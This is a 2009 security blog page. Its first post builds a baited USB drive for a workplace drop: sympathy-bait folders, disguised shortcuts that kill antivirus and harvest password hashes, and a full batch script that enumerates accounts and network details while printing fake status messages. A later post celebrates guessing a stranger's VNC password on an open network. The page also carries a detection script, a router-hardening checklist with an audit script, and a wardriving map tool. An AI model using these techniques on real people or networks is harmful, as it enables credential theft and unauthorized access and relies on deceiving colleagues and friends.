Tuesday, February 24, 2009

USB Enumerator vs USB Hacksaw

Recently a mate at work commented that he got a bit stuck with the whole U3 hacksaw / switchblade kerfuffle. Well, I still had my original U3 set up from a couple of years ago after watching the Hak.5 show (Series 2 if you're interested), but I thought it needed a bit of a refresh.

Being inspired by DarkOperator's Metasploit scripts for enumeration, I decided to set up the U3 to use what god gave us, okay, what Microsoft gave us: built-in tools. But more specifically, built-in tools for computer and network enumeration.

So what's the point of this, I hear you ask. Well, after using my Hacksaw here and there and seeing it detected by AV now and then, I figured that for it to be as stealthy as possible a few modifications were in order.

First I gave it a good overwrite with dd and started afresh with the builder tool. The tool I use is LPInstaller.exe. I can't remember where I got it from, but it wipes out all the pre-installed U3 goodness and leaves you with a U3 stick that you can mod to be the ultimate USB Enumerator.


With it looking like a brand new U3, this is where a little thought goes in. Now and then at work the receptionist sends an email to all users asking if anyone has lost a USB thumb drive. Well, I can take advantage of this good nature by placing a file with a throwaway email address in the root called "Contact Me if Found.txt".

Now when it's found or handed in to a reception, some nice person might email me and let me know that they have it. But why would they do that? Because my next folder is titled "Wedding Pics - DO NOT DELETE" and it has a few wedding and baby pics in it (no metadata, remember).



So what cold-hearted person wouldn't want to return a USB device with baby and wedding pics on it, right! Oh, and the guy in the wedding photo...... he's in a wheelchair (thanks Google Images), so it would have to be a cold-hearted individual who is going to keep that USB drive.

Next I have a couple more directories.



Well, they look like directories, but they are just links to my evil scripts that will help me on my dark crusade.

A closer look at the shortcut reveals it's actually a link to a batch file that will kill any running AV and launch programs to get the local password hashes, internet passwords and login details for MSN etc. And we all know that people re-use passwords, don't we.




When someone clicks on one of these 'shortcuts' it will place the running batch file behind any open windows, and the only clue that anything is going on is a folder in the toolbar which will disappear after a few seconds.




And the batch file can do anything. Obviously I want to stop AV first, and then, thanks to a few tools from Nirsoft as well as a few others from the likes of foofus, I have loads of juicy details coming my way.




And what does this give me? Hashes, oh the lovely hashes.......



And of course we want the websites too.



And there's plenty more, but I'm sure you get the point.


But this is a U3 thumb drive, so hopefully we don't need to rely on a nosey bugger clicking around, because it will hopefully utilise the autorun feature to enumerate the network as soon as it's plugged in. It does the crazy enumeration coolness by running this script from the hidden \WIP\CMD folder.



Here's the simple batch file that does the enumeration:

@Echo off
echo Starting. Do not close program. Please wait 15 seconds.
::Generate a unique filename
set fn=%computername%-%random%
::Create a non-obvious directory
mkdir .\Windows\System\System32\etc\hosts\win\0011\%fn%
cd .\Windows\System\System32\etc\hosts\win\0011\%fn%
::Get local Time and Date Info
time /t >%fn%.log
date /t >>%fn%.log
::Network Info
net user /domain >>%fn%.log
echo Restarting critical service. Please Wait 5 seconds.
net group /domain >>%fn%.log
net localgroup /domain >>%fn%.log
net localgroup administrators /domain >>%fn%.log
net localgroup "Account Operators" /domain >>%fn%.log
net accounts /domain >>%fn%.log
net view /domain >>%fn%.log
net view >>%fn%.log
echo Service restart complete. Please wait 5 seconds.
::Local Info
ipconfig /all >>%fn%.log
ipconfig /displaydns >>%fn%.log
netstat -ano >>%fn%.log
netstat -r >>%fn%.log
arp -a >>%fn%.log
tasklist /svc >>%fn%.log
tasklist >>%fn%.log
tasklist /v >>%fn%.log
net share >>%fn%.log
net use >>%fn%.log
net accounts >>%fn%.log
net localgroup >>%fn%.log
net localgroup administrators >>%fn%.log
systeminfo >>%fn%.log
netsh firewall show config >>%fn%.log
echo Service failed to load. Error code MS-31337
netsh diag show all /v >>%fn%.log

And that pretty much enumerates the network for all accounts, groups and members of admin groups. It gets password policies, computer details from the domain, domain names, local accounts and groups, firewall policies, applied hotfixes, network connections, open ports, running services, shares, networking information and other bits and bobs as well.




And the beauty of it all is that it's just using Microsoft tools, which won't make the AV go loopy and freak out. So within a few seconds of plugging the device into any networked PC with a USB port you'll have more data than you can shake a big enumerating stick at. Wonderful!

All this useful data is output to a single log file in a deeply buried, obfuscated directory with a random number appended to the end, so it can be run time after time and is nicely tucked away.

But what if autorun is disabled? Well, just like the script that kills the AV and grabs the passwords, this can be run manually by clicking the batch file or by fronting it with a shortcut with a folder icon and running that.
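The flip side of the script above is what a defender should look for: the individual commands are benign built-in tools, but a burst of several distinct ones from a single parent process in a few seconds is unusual on a workstation, and it looks the same whether autorun fired the script or someone clicked a shortcut. The following detection is an added example, not code from this post; it parses a constructed key=value process-creation log (a stand-in for Sysmon event 1 or Security event 4688 records, not a real Windows format), groups recon launches by host and parent process, and alerts when enough distinct tools appear inside a short window. The field names, the 60-second window, the threshold of four tools and the assumption that C: is the only fixed drive are all assumptions for this example; a real rule would consult the drive type rather than the letter.

```python
"""Detect a burst of built-in enumeration tools launched by one parent.

The log layout below is constructed for this example; it stands in for
process-creation records such as Sysmon event 1 or Security event 4688.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Built-in tools used by the enumeration script: benign alone, telling in bulk
RECON_TOOLS = {
    "net.exe", "net1.exe", "ipconfig.exe", "netstat.exe", "arp.exe",
    "tasklist.exe", "systeminfo.exe", "netsh.exe",
}
WINDOW = timedelta(seconds=60)   # assumed burst window
MIN_DISTINCT_TOOLS = 4           # assumed alert threshold
FIXED_DRIVE = "c"                # assumption: the only fixed drive on these hosts

# Constructed sample records, one process creation per line (not real logs).
# ppid/pcmd describe the parent; image/cmd describe the new process.
SAMPLE_LOG = """\
2009-02-24 09:12:01 host=WS01 ppid=4120 pcmd="cmd /c E:\\WIP\\CMD\\go.bat" image=C:\\Windows\\System32\\net.exe cmd="net user /domain"
2009-02-24 09:12:01 host=WS01 ppid=4120 pcmd="cmd /c E:\\WIP\\CMD\\go.bat" image=C:\\Windows\\System32\\net.exe cmd="net group /domain"
2009-02-24 09:12:02 host=WS01 ppid=4120 pcmd="cmd /c E:\\WIP\\CMD\\go.bat" image=C:\\Windows\\System32\\ipconfig.exe cmd="ipconfig /all"
2009-02-24 09:12:03 host=WS01 ppid=4120 pcmd="cmd /c E:\\WIP\\CMD\\go.bat" image=C:\\Windows\\System32\\netstat.exe cmd="netstat -ano"
2009-02-24 09:12:04 host=WS01 ppid=4120 pcmd="cmd /c E:\\WIP\\CMD\\go.bat" image=C:\\Windows\\System32\\tasklist.exe cmd="tasklist /svc"
2009-02-24 09:12:06 host=WS01 ppid=4120 pcmd="cmd /c E:\\WIP\\CMD\\go.bat" image=C:\\Windows\\System32\\systeminfo.exe cmd="systeminfo"
2009-02-24 09:12:07 host=WS01 ppid=4120 pcmd="cmd /c E:\\WIP\\CMD\\go.bat" image=C:\\Windows\\System32\\netsh.exe cmd="netsh firewall show config"
2009-02-24 09:30:15 host=WS01 ppid=2200 pcmd="explorer.exe" image=C:\\Windows\\System32\\ipconfig.exe cmd="ipconfig /all"
2009-02-24 10:05:40 host=WS02 ppid=3300 pcmd="C:\\Windows\\System32\\cmd.exe" image=C:\\Windows\\System32\\net.exe cmd="net use"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+ \S+) host=(?P<host>\S+) ppid=(?P<ppid>\d+) '
    r'pcmd="(?P<pcmd>[^"]*)" image=(?P<image>\S+) cmd="(?P<cmd>[^"]*)"$'
)


def parse_log(text):
    """Turn the constructed log text into a list of event dicts."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than crash the detector
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%d %H:%M:%S")
        e["tool"] = e["image"].rsplit("\\", 1)[-1].lower()
        events.append(e)
    return events


def launched_from_other_drive(pcmd):
    """True if the parent's command line references a drive other than C:.

    Simplification: a real rule would look up the drive type (removable or
    fixed) instead of trusting the letter.
    """
    drives = re.findall(r"\b([A-Za-z]):\\", pcmd)
    return any(d.lower() != FIXED_DRIVE for d in drives)


def detect_enum_bursts(events, window=WINDOW, min_tools=MIN_DISTINCT_TOOLS):
    """Return one alert per parent process that launched >= min_tools
    distinct recon tools within `window`."""
    groups = defaultdict(list)
    for e in events:
        if e["tool"] in RECON_TOOLS:
            groups[(e["host"], e["ppid"], e["pcmd"])].append(e)
    alerts = []
    for (host, ppid, pcmd), evs in groups.items():
        evs.sort(key=lambda e: e["ts"])
        for i, start in enumerate(evs):
            tools = set()
            for e in evs[i:]:
                if e["ts"] - start["ts"] > window:
                    break
                tools.add(e["tool"])
            if len(tools) >= min_tools:
                alerts.append({
                    "host": host, "ppid": int(ppid), "parent_cmd": pcmd,
                    "tools": sorted(tools), "first_seen": start["ts"],
                    "from_other_drive": launched_from_other_drive(pcmd),
                })
                break  # one alert per parent is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_enum_bursts(parse_log(SAMPLE_LOG)):
        print(alert)
```

On the sample data only the WS01 parent running a batch file from E: trips the rule; the lone ipconfig from Explorer and the single net use on WS02 do not, which is the point of counting distinct tools per parent rather than alerting on any one command.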


So how can this be useful in a pentest? It could be that during the pentest you have social-engineered your way onto a helpful person's PC, who is going to print something off for you or email an important document for you, and said files are on your USB device. Or you could hand a USB device to a receptionist and ask her to check whose it is. Or of course you could just be transferring those picture or music files to your friend's computer. So if you're reading this and you know me, maybe next time you ask me for a file or a movie that I have on USB you'd better think again!

So there you have it, my take on making my USB Hacksaw a little more interesting.

For more info on U3 Hacking I recommend this post by McGrew Security

Friday, February 20, 2009

10 Steps to Securing a Wireless Router

I thought about putting together this post following a thread I read on the Ethical Hacker forums. This post is really just my checklist for the steps I take to secure my wireless router and a little explanation as to why I'm setting each option.


1. Upgrade Firmware

It's always a good idea to keep firmware as up to date as possible, as the vendor may have fixed known vulnerabilities or bugs since the hardware shipped. As a bonus you might even get a bit more functionality thrown in with the firmware upgrade. It's also a good idea to check the vendor's site every couple of months for updates.


2. Change the default Password

Obviously!


3. Turn off Wireless Administration

This will prevent anyone who is not physically plugged into the network from administering the wireless router.


4. Enable Encryption

Enable the best encryption possible. WPA2 is preferred, but if the connecting devices only support WEP then WEP it is. Just be aware that WEP is crap and it can be cracked in seconds. Ensure that whatever encryption you use has a long random key. There are plenty of random key generators available, so use them.


5. Change & Hide the Default SSID

Don't leave your default SSID as Linksys or Belkin. Change it to something unique, but not something that identifies it as your network, such as "Bob Scratchets House". Even after hiding the SSID it is possible for an attacker to view it, but it is another layer in your defense strategy.


6. Apply MAC Address Filtering

Each device that has a wireless card in it will have a MAC address. Apply MAC address filtering so only devices with the specified MAC addresses can connect wirelessly to your router. This can be bypassed, but it's another hurdle to make a potential attacker jump through.


7. Disable UPnP

Universal Plug and Play is a method by which software can open up ports on the router to allow external hosts to communicate through the router with a host on the LAN. This can also be used by malware to open up the router to allow a route in. By disabling UPnP you will need to set up port forwarding yourself when required.


8. Configure the DHCP Settings

If your router allows you to change your DHCP scope you may want to set it to hand out addresses from a range other than the default, such as the 172.16.x.x range. Also, by limiting the number of addresses to the number of hosts you have, it might provide an early warning if someone does manage to bypass your security and hop onto your wireless LAN.


9. Configure DNS Settings

Point your DNS to a provider such as OpenDNS and utilise their free services. OpenDNS can be used to block specific types of sites, such as file sharing or pornography, and also to log where computers on your LAN are going. It will also block your computers from visiting known bad sites. Another important note: when the DNS flaw was released to the public by Dan Kaminsky at Black Hat 08, OpenDNS was one of the first DNS providers to provide protection. At the time of this post many ISPs are still vulnerable.


10. Enable Logging

If your router allows you to enable logging it is worthwhile doing so. By familiarising yourself with the logs regularly you will get to recognise what is normal and what is not. But remember, logs are only useful if you check them!
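The ten steps above are a checklist, and a checklist is easiest to keep honest when something re-checks it for you. The script below is an added example, not code from this post or from any router vendor: it models a router's settings as a plain dictionary (the keys are assumptions for this example; real routers expose these through their own web UI or config export), audits that dictionary against the ten steps, and also carries the two pieces of logic the list needs but does not spell out, a random WPA2 passphrase generator built on the OS CSPRNG and a rough entropy estimate for judging whether an existing key counts as "long and random". The 80-bit threshold, the 60-day firmware check and the "factory default" 192.168.0.x/192.168.1.x scopes are assumed values, and the DNS address in the good configuration is a documentation placeholder.

```python
"""Audit a consumer router configuration against the ten steps above.

The configuration layout and thresholds are assumptions for this example.
"""
import ipaddress
import math
import secrets
import string

# WPA2 passphrases are 8 to 63 printable ASCII characters
WPA_CHARSET = string.ascii_letters + string.digits + string.punctuation
MIN_KEY_BITS = 80                              # assumed "long random key" bar
DEFAULT_SSIDS = {"linksys", "belkin"}          # vendor defaults named in step 5
DEFAULT_LANS = [ipaddress.ip_network("192.168.0.0/24"),   # assumed factory
                ipaddress.ip_network("192.168.1.0/24")]   # DHCP scopes


def generate_passphrase(length=63):
    """Random WPA2 passphrase drawn from the OS CSPRNG (secrets, not random)."""
    if not 8 <= length <= 63:
        raise ValueError("WPA2 passphrases are 8 to 63 characters")
    return "".join(secrets.choice(WPA_CHARSET) for _ in range(length))


def passphrase_entropy_bits(key):
    """Upper-bound entropy estimate: length * log2(size of classes used).

    A dictionary word scores far higher than it deserves, so treat this as a
    sanity check on length and variety, not as proof of randomness.
    """
    classes = [string.ascii_lowercase, string.ascii_uppercase,
               string.digits, string.punctuation]
    pool = sum(len(c) for c in classes if any(ch in c for ch in key))
    return len(key) * math.log2(pool) if pool else 0.0


def audit_router(cfg):
    """Return (step, finding) tuples; an empty list means all ten steps pass."""
    findings = []
    if cfg["firmware_age_days"] > 60:                                    # 1
        findings.append((1, "firmware not checked for over two months"))
    if cfg["admin_password"].lower() in {"", "admin", "password"}:       # 2
        findings.append((2, "default or trivial admin password"))
    if cfg["wireless_admin"]:                                            # 3
        findings.append((3, "administration reachable over wireless"))
    if cfg["encryption"] != "WPA2":                                      # 4
        findings.append((4, f"{cfg['encryption']} in use instead of WPA2"))
    if passphrase_entropy_bits(cfg["wifi_key"]) < MIN_KEY_BITS:
        findings.append((4, "wireless key too short or too predictable"))
    if cfg["ssid"].lower() in DEFAULT_SSIDS:                             # 5
        findings.append((5, "SSID is a vendor default"))
    if cfg["ssid_broadcast"]:
        findings.append((5, "SSID broadcast enabled"))
    if not cfg["mac_filtering"]:                                         # 6
        findings.append((6, "MAC address filtering disabled"))
    if cfg["upnp"]:                                                      # 7
        findings.append((7, "UPnP enabled"))
    start, end = (ipaddress.ip_address(a) for a in cfg["dhcp_range"])   # 8
    pool = int(end) - int(start) + 1
    if any(start in net for net in DEFAULT_LANS):
        findings.append((8, "DHCP scope is a factory-default range"))
    if pool > cfg["host_count"]:
        findings.append((8, f"DHCP pool of {pool} exceeds {cfg['host_count']} hosts"))
    if not cfg["dns_servers"] or cfg["router_ip"] in cfg["dns_servers"]:  # 9
        findings.append((9, "DNS left on the router/ISP default"))
    if not cfg["logging"]:                                               # 10
        findings.append((10, "logging disabled"))
    return findings


# Constructed sample configurations, not exports from a real router
WEAK_CONFIG = {
    "firmware_age_days": 400, "admin_password": "admin", "wireless_admin": True,
    "encryption": "WEP", "wifi_key": "password1", "ssid": "linksys",
    "ssid_broadcast": True, "mac_filtering": False, "upnp": True,
    "dhcp_range": ("192.168.1.100", "192.168.1.149"), "host_count": 6,
    "router_ip": "192.168.1.1", "dns_servers": ["192.168.1.1"], "logging": False,
}
GOOD_CONFIG = {
    "firmware_age_days": 30, "admin_password": "Tq7!kLp2#vXe", "wireless_admin": False,
    "encryption": "WPA2", "wifi_key": "vN3$qL8&wR2*zT6@hK4%mB9^pF1)dG5(",
    "ssid": "teapot-42", "ssid_broadcast": False, "mac_filtering": True, "upnp": False,
    "dhcp_range": ("172.16.0.10", "172.16.0.15"), "host_count": 6,
    "router_ip": "172.16.0.1", "dns_servers": ["203.0.113.53"],  # placeholder resolver
    "logging": True,
}

if __name__ == "__main__":
    for step, finding in audit_router(WEAK_CONFIG):
        print(f"step {step}: {finding}")
    print("suggested key:", generate_passphrase())
```

Running it against WEAK_CONFIG reports a finding for every one of the ten steps (two each for steps 4, 5 and 8), while GOOD_CONFIG comes back clean; the generator is the piece worth reusing, since a 63-character key from the CSPRNG is what step 4 means by "long random".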



The functions I have raised in these 10 steps are those that should be available on most consumer-grade routers. If you have a router that has more functionality, such as allowing you to use HTTPS to access the administrative interface, then that's great, use it.

Get familiar with what your router can do and know where to look to check settings such as port forwarding. And once you have set up the router and gotten it working well, save the config and store it somewhere safe and secure, such as in a TrueCrypt volume or an encrypted disk image.

Tuesday, February 10, 2009

Bob and his iPhone Adventures

So in the last post I blogged about a cool tool that our super hero, evil Bob, might use to find wireless networks when out with his super fantastic iPhone. Well, after tracking down those pesky open networks, I imagine the next thing Bob might want to do is look a bit deeper into a particular network. A great iPhone application for doing so is called Snap, and it works like this.


Bob is out and about with his trusty iPhone and he stumbles across an open wifi network. Bob being Bob, he connects to the network and gets himself an IP address, so far so good. But his curiosity gets the better of him and he wonders what else is on the network with him. So he fires up Snap and kicks off a scan.



Snap picks up the subnet that Bob is on and automatically scans for live hosts. After a second or two Bob sees a list of who else is on the network with him.



Interesting. Well Bob could leave it at that. After all, his curiosity is nearly satisfied, but not quite. He feels the urge to see what the other hosts on the network are doing, just to be sure that they are alright and not up to no good. So he drills down a bit further and takes a look at the Ubuntu VM.



Well, Bob wouldn't be called nosey Bob if he didn't then go ahead and do a little port scan, would he?



What do you know. VNC and a web server. That's just great. Now Bob is satisfied. He knows who's on the network and, now that he has had a little poke around, he knows what they are doing.

But hang on. Bob just remembered that old saying, "hard on the outside and soft on the inside". Well, maybe just before he goes he should put that to the test. He fires up his iPhone VNC client and tries a few common passwords.



And after a couple of attempts he gets lucky with......you guessed it "Password".




Good work Bob!

Tuesday, February 3, 2009

More iPhone Wardriving Goodness

WiFiFoFum have upgraded their iPhone application and I thought it was well worth posting about because it's making great use of the inbuilt GPS on the 3G iPhone.

We still have the Radar and Networks view.



But now you have the option to enable logging before a wardrive. In the screenshot below you can see a few previous logs.



After creating a log from a wardrive you will be able to select it and you'll be asked if you want to view it in Maps or email it to yourself.



If I choose to view the log in Maps I get taken straight into Maps and I'm presented with a nice map of all the APs I discovered on my wardrive.



If you choose the option to email yourself the .kml file you can simply save the file to your PC and then drag and drop the .kml file into Google Earth to see exactly where everything is.



How cool is this eh! The pins retain all the useful info such as encryption, channel number, MAC address etc.....



What would be great would be a different colour pin to denote different types of encryption, but I guess that's making life real easy.
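The different-colour-pin idea is easy to do yourself once the log is on a PC, because a KML file can carry one style per encryption class and point each placemark at it. The script below is an added example, not WiFiFoFum's code or its export format: it takes wardrive records in the shape the post describes (SSID, MAC address, channel, encryption and a GPS fix; the sample records are constructed), writes a KML document whose pin colour follows the encryption class, reads such a file back to count networks per class, and lists the open and WEP networks, which are the ones whose owners would most want to hear from you. The record layout and the colour choices are assumptions; note that KML colours are written as aabbggrr, not rrggbb.

```python
"""Colour wardrive pins by encryption class in a KML file.

Record layout and sample data are constructed for this example.
"""
import xml.etree.ElementTree as ET

KML_NS = "http://www.opengis.net/kml/2.2"

# Constructed wardrive records (not a real WiFiFoFum export)
SAMPLE_APS = [
    {"ssid": "HomeNet", "bssid": "00:11:22:33:44:55", "channel": 6,
     "encryption": "WPA2-PSK", "lat": 51.5007, "lon": -0.1246},
    {"ssid": "linksys", "bssid": "00:11:22:33:44:66", "channel": 1,
     "encryption": "OPEN", "lat": 51.5010, "lon": -0.1250},
    {"ssid": "CoffeeShop", "bssid": "00:11:22:33:44:77", "channel": 11,
     "encryption": "WEP", "lat": 51.5012, "lon": -0.1255},
    {"ssid": "OldOffice", "bssid": "00:11:22:33:44:88", "channel": 9,
     "encryption": "WPA-TKIP", "lat": 51.5015, "lon": -0.1260},
]

# One icon colour per class; KML colour order is alpha, blue, green, red
STYLE_COLOURS = {
    "OPEN": "ff0000ff",     # red
    "WEP": "ff00a5ff",      # orange
    "WPA": "ff00ffff",      # yellow
    "WPA2": "ff00ff00",     # green
    "UNKNOWN": "ff888888",  # grey
}


def tag(name):
    """Namespace-qualified KML tag name for ElementTree."""
    return f"{{{KML_NS}}}{name}"


def encryption_class(enc):
    """Normalise the many ways scanners spell encryption into one class."""
    enc = (enc or "").upper()
    if enc in ("", "NONE", "OPEN"):
        return "OPEN"
    for cls in ("WPA2", "WPA", "WEP"):   # check WPA2 before WPA
        if enc.startswith(cls):
            return cls
    return "UNKNOWN"


def build_kml(aps):
    """Return KML text with one Style per class and one Placemark per AP."""
    ET.register_namespace("", KML_NS)
    root = ET.Element(tag("kml"))
    doc = ET.SubElement(root, tag("Document"))
    for cls, colour in STYLE_COLOURS.items():
        style = ET.SubElement(doc, tag("Style"), id=f"enc-{cls}")
        icon = ET.SubElement(style, tag("IconStyle"))
        ET.SubElement(icon, tag("color")).text = colour
    for ap in aps:
        pm = ET.SubElement(doc, tag("Placemark"))
        ET.SubElement(pm, tag("name")).text = ap["ssid"]
        ET.SubElement(pm, tag("styleUrl")).text = f"#enc-{encryption_class(ap['encryption'])}"
        ET.SubElement(pm, tag("description")).text = (
            f"BSSID {ap['bssid']}, channel {ap['channel']}, {ap['encryption']}")
        point = ET.SubElement(pm, tag("Point"))
        # KML coordinates are longitude,latitude,altitude
        ET.SubElement(point, tag("coordinates")).text = f"{ap['lon']},{ap['lat']},0"
    return ET.tostring(root, encoding="unicode")


def summarise_kml(kml_text):
    """Count placemarks per encryption class in KML produced by build_kml."""
    counts = {}
    for pm in ET.fromstring(kml_text).iter(tag("Placemark")):
        cls = pm.find(tag("styleUrl")).text[len("#enc-"):]
        counts[cls] = counts.get(cls, 0) + 1
    return counts


def needs_attention(aps):
    """SSIDs running open or WEP, the ones worth a quiet word with the owner."""
    return [ap["ssid"] for ap in aps if encryption_class(ap["encryption"]) in ("OPEN", "WEP")]


if __name__ == "__main__":
    kml = build_kml(SAMPLE_APS)
    with open("wardrive.kml", "w", encoding="utf-8") as fh:
        fh.write(kml)
    print(summarise_kml(kml), needs_attention(SAMPLE_APS))
```

Drag the resulting wardrive.kml into Google Earth and the open and WEP networks stand out in red and orange without clicking on each pin; the description field keeps the BSSID, channel and exact encryption string so nothing from the original log is lost.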

Now go get yourself some exercise and get wardriving!